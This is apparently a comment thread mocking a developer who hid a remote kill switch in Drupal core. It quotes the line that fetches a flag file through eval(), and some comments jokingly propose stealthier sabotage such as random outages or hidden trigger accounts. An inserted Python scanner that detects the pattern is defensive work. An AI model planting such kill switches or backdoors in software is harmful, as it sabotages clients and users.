Admin
He was probably thinking "Maybe I needing later". Possibly the same guy, to boot.
Also, fr1st!!!1111eleven
Admin
He's not the frist to do something like that.
Admin
It's refreshing for a change to see a developer using Hungarian notation in his name but not his code.
Admin
OMG, that's not only really bad code, that's a backdoor. Loading code from remote server and "eval"uating it is worst practice ever...
1st php-lesson: eval() is evil() 2nd php-lesson: Never use eval() etc...
Captcha acsi
Admin
Markeiting + sholders = missing spell check.
Admin
We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used. I really wanna smack the original developer. Not for the killswitch, not even for eval(), but for wrapping a variable declaration in a useless method call.
CAPTCHA: uxor. Uber XOR. 1 UXOR 2 = 2
Admin
uhoh someone is on to the clue
Admin
I don't think much of the obfuscation of the guilty URL. (Select the text...)
Admin
This is SOP for UK MOD redaction, I see nothing wrong with it.
Admin
This can be done with URLClassLoader in Java.
Admin
If we'd revoke the programming license of people building such killswitches, the world would be a better place.
Then again, if there were programming licenses, most of this crap could be prevented in the first place...
Admin
Isn't Drupal just one big backdoor?
Admin
Admin
really? I found it very amusing...
Admin
All have licenses. Government issued paperwork does not guarantee competence.
Admin
Or he could just install a rootkit. Evil in any way.
Admin
If you are going to have programming licenses, then you need to have programming police as well, who patrol your source code, and write you $175 tickets.
Admin
Before anyone gets excited -
I suspect that the domain name is fake and that the "obfuscation" used was a dig at the UK MOD.
Admin
TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that. It makes it much more difficult to realize, and is much funnier in the long term.
Admin
Admin
Initrode is an Office Space reference
Admin
Admin
It used to be common practice to use eval to catch (and ignore) any errors. If file_get_contents failed for any reason (like that function being disabled) the code silently eats that fail. I suspect this code was written before PHP 5 introduced try / catch.
Admin
Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.
I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...
Admin
TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?
Admin
"Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel
"Worse Than February" for weathermen
"Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts
"Worse Than Furtrapping" for government registered animal rights liberationists
Admin
Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.
Admin
TRWTF is RGB(0,0,0)
Like seriously, you can't just use the native: "#000"?
Admin
Admin
Worst idea ever. I love it.
Admin
Sad thing is, he really had potential as an evil genius, disguising a full-blown backdoor as a simple killswitch that even half of the commenters here fell for, and then making such a simple mistake.
Admin
This Nagesh is obviously a fake; note the correct English and grammar on all of its posts. The real Nagesh writes in Hinglish.
Admin
Wasn't that hard to see. If your eval is followed by a URL... red flags and loud klaxon alarms should be going off.
Admin
Admin
The code hacked directly into the Drupal core; if the Drupal installation ever got updated (i.e. if a security patch was released), installing the update would have wiped out the hack (and any other hacks lurking in the core).
The eval() is completely arbitrary. The @ sign at the start of the code blocks any error reporting from that line, and there's no dynamic content in the eval(). Really no idea why he used eval() for this at all. It would have worked exactly the same without it.
It's not just the firewall that could have blocked this from working. PHP has a config setting that will prevent file_get_contents() from loading remote URLs. This setting is generally recommended to be enabled for security reasons, so the code given wouldn't work on a default PHP installation, regardless of the firewall setting.
The "strangely out of place line" seems to be missing from the original post. I assume it's a function call that leads to the eval() line?
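The two points above (the eval() wrapped around a remote file_get_contents() call, and the PHP directive that stops file_get_contents() from fetching URLs at all) are easy to check for mechanically. The following is an added example for this thread, not code from the original post or from Drupal: a small Python scanner that flags PHP source lines combining eval() with a remote file_get_contents(), plus a parser for the allow_url_fopen directive in a php.ini fragment. The sample PHP and php.ini text are constructed for the example; the initrode-global.com URL is the placeholder from the thread and is never contacted.

```python
"""Added example (not from the original thread or from Drupal).

Flags PHP lines that combine eval() with a remote file_get_contents(),
and reports whether a php.ini fragment leaves allow_url_fopen enabled.
"""
import re

# file_get_contents() with an http(s) URL literal as its argument
REMOTE_FETCH = re.compile(r'file_get_contents\s*\(\s*["\']https?://', re.IGNORECASE)
# eval() anywhere on the line; a leading '@' error-suppression is irrelevant here
EVAL_CALL = re.compile(r'\beval\s*\(', re.IGNORECASE)


def scan_php(source: str):
    """Return a list of (line_no, reason) for each suspicious line in `source`."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        has_eval = EVAL_CALL.search(line) is not None
        has_remote = REMOTE_FETCH.search(line) is not None
        if has_eval and has_remote:
            findings.append((no, "eval() combined with remote file_get_contents()"))
        elif has_remote:
            findings.append((no, "remote file_get_contents()"))
        elif has_eval:
            findings.append((no, "eval()"))
    return findings


def allow_url_fopen_enabled(ini_text: str) -> bool:
    """Parse a php.ini fragment and return True if allow_url_fopen is on.

    PHP's built-in default for this directive is On, so a fragment that
    never mentions it counts as enabled.
    """
    enabled = True
    for raw in ini_text.splitlines():
        line = raw.split(';', 1)[0].strip()  # ';' starts a comment in php.ini
        if '=' not in line:
            continue
        key, _, value = line.partition('=')
        if key.strip().lower() == 'allow_url_fopen':
            enabled = value.strip().strip('"').lower() in ('1', 'on', 'true', 'yes')
    return enabled


# Constructed sample PHP: line 3 is the kill-switch line quoted in the thread.
SAMPLE_PHP = r'''<?php
// constructed sample file; the domain below is the thread's placeholder
eval( @$enabled = trim(file_get_contents("http://initrode-global.com/rg_initrode.txt")); if(!$enabled) exit; );
$config = file_get_contents("/etc/drupal/settings.php");
$feed = file_get_contents("https://example.invalid/feed.xml");
echo "hello";
'''

# Constructed php.ini fragments: PHP's shipped default, and a hardened one.
SAMPLE_INI_DEFAULT = """; constructed fragment
allow_url_fopen = On
allow_url_include = Off
"""
SAMPLE_INI_HARDENED = """; constructed fragment
allow_url_fopen = Off   ; file_get_contents() can no longer fetch URLs
allow_url_include = Off
"""

if __name__ == "__main__":
    for no, reason in scan_php(SAMPLE_PHP):
        print(f"line {no}: {reason}")
    print("default ini allows remote fopen:", allow_url_fopen_enabled(SAMPLE_INI_DEFAULT))
    print("hardened ini allows remote fopen:", allow_url_fopen_enabled(SAMPLE_INI_HARDENED))
```

Run against a real checkout, you would feed each .php file's text to scan_php() and the effective php.ini (php --ini shows which one is loaded) to allow_url_fopen_enabled(); a hit on the combined eval-plus-remote-fetch reason is the kill-switch pattern from the article, and the other two reasons are merely worth a look.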
Admin
Admin
Run this and see what happens.
eval( $test = "echo 'wooooooo';" );
The assignment statement is evaluated as an expression, which evaluates to the contents of the assignment.
Admin
I know Runescape did (still doing?) something like this, except instead of using a URLClassLoader, they simply made their own and verified that the external code they were loading was of the correct size. This meant that if you put the Runescape applet and your own on the same web page you could trick it into loading different code instead and compromise someone's computer if they had (previously) chosen to always trust Runescape applets, just by having them visit a web site. Can't do this anymore, since changing an Applet's stub requires a security permission if it isn't already set.
Admin
I thought the P in LAMP was Perl/Python/PHP, all depending on what flavor you wanted?
Admin
Admin
Because that's what it stands for! "P" can stand for Perl, PHP, or Python; although, I mostly use it in reference to PHP.
Admin
Admin
Drupal has a couple of good core backdoors for this use case: probably the best is that users can create their own accounts in the default install. So instead of looking for a file on his own server, he could have looked for a user on the Drupal instance with a distinct name.
If user "fhqwhgads" exists, then do whatever...
Admin
Admin
Admin
FTFY.
Admin
He must have spent too much time working on the project and not enough time on the killswitch.
Best have another (seemingly unsabotaged) application look for the internet kill-flag and just store it, and then have the sabotaged app look that up in the unsabotaged system.
Admin
So when it's done on the web in PHP, we call it a malicious backdoor. Developers who use it are unethical.
If it's done on the desktop, mobile platform, or video game console, we call it DRM and it's illegal (in the United States anyway) to circumvent. Developers cherish it, thinking it will stop piracy (HA!)
What a messed up world...
Admin
Why does everyone think this is a backdoor? Maybe it will be easier to see if it's formatted:
eval( @$enabled = trim(file_get_contents("http://initrode-global.com/rg_initrode.txt")); if(!$enabled) exit; )
For one thing, eval() expects a string argument--not PHP code--so this won't even run. And even if the code inside the eval() were run, it would not evaluate the contents of the remote file! It would just assign the contents to $enabled.
Admin
Java at least has SecurityManager classes. You can sandbox your JVM. For example, the Java SQL stored procedures do so.